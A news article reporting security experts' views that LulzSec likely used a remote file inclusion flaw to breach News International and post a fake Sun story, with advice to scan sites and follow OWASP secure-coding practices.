Quarter of web sites could be hacked like The Sun

As many as one in four web sites could be taken over in the same way as LulzSec members are believed to have infiltrated News International's servers this week to post a fake Sun story about the death of Rupert Murdoch, according to experts.

On Tuesday night, LulzSec hackers are believed to have exploited a remote file inclusion (RFI) flaw on a mothballed internal server which had been hosting the 'new-times.co.uk' domain.

An RFI vulnerability typically allows the hacker to gain complete control of a victim's server to run images or files from an external site. Gaining access to the server in question could have made it easy for the hackers to then access The Sun's content management system.

Although the hacking method has yet to be confirmed, LulzSec in particular is well known for exploiting RFI flaws in its hacks, according to a researcher from a security firm who declined to be named.

"The sad thing is that a quarter of sites could be taken over like this. So many sites have these vulnerabilities," he told V3. "Most of the things that have been said about this hack, though, are pure speculation."

The researcher complained that much of what had been said in a recent article in The Guardian, in particular relating to how the hackers obtained a large dump of News International emails, was "bull".

Jason Steer, EMEA senior solutions architect at security firm Veracode, agreed that an RFI flaw is the most likely way LulzSec managed to post the fake Sun story.

"The flaw is fairly well documented. It was an OWASP top 10 in 2007, and it's fairly easy for developers to fix," he told V3.

"If you're a hacker you don't go for the hard stuff, you go for the easiest [relatively unpatched] systems."

John Stock, senior security consultant at Outpost 24, argued that 99 per cent of RFI flaws are down to poor coding, and that companies need to pay more attention to scanning their systems for such vulnerabilities.

"An SQL injection flaw is bad, as it can enable hackers to get the data out, but file inclusion is even worse. You can take over the server and still have access to that data," he told V3.

Stock urged developers to consult OWASP on secure coding practices.

"I don't think anyone should put anything on the internet without checking them first. News International spent millions on its [security] and yet OWASP is free."